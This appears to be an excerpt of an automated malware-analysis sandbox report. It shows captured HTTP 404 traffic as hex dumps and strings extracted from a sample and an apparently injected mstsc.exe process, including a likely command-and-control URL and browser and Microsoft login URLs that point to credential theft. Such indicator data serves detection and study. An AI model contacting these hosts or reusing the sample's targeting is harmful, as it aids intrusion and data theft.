            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:47:27 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:47:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:47:32 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:47:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouS10xTwD8ru2V88eyeaUNzDjjw3jcB4v0AGRb785Rx3vIc0iiXEEnHV%2FqKaKJt1ZsnwxtmHdX7wth%2FnmdEatUUiL%2Bh%2FJ7DHbeCP2TPGIf%2BFlS6sFwN5hHHXVXWCxJIGz6a9eA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7202efc44370-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WQdDnWPed89HzWGgTf51KdnXSFEtI3uir7Bx6AExEa38vvlI2f7jwfuMiuX1GLk3qOM%2F%2FpJV5mKz%2FBAdiMSqk39Uo9HMeDDxeIB%2Blsq38rNqa44wCocskp54eRP323TYLhToQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7212b843438b-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di8wk5AqH3nA9jjmt6k2vVl9RnR7jhFGrz0ojU7e09kNJ%2BtxUYtIa5ipTpIiYztYEA19NgnQLpOw2wE8JLB58Z5zfQL%2B5vhXHa%2Bad0LpMFY4Lsv8M7LLyYsX5NV5Tl9sAr85cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a72244da2b9c5-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:49:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b02zpv%2BTZ0k02sDOFHzZyUuvMqFcsCQ9EePCYzr5Vhd53SM5QjSsLymWlfvnX7C8qeaGAQhvzwffFkaham4A45glhKEdHLAUitxRVxuStlepiJqHDWEB7P5REusFuPVgAtGQsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8a7235eb98c461-EWRData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency/zznj/
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mstsc.exe, 00000003.00000002.3548096253.000000000556C000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
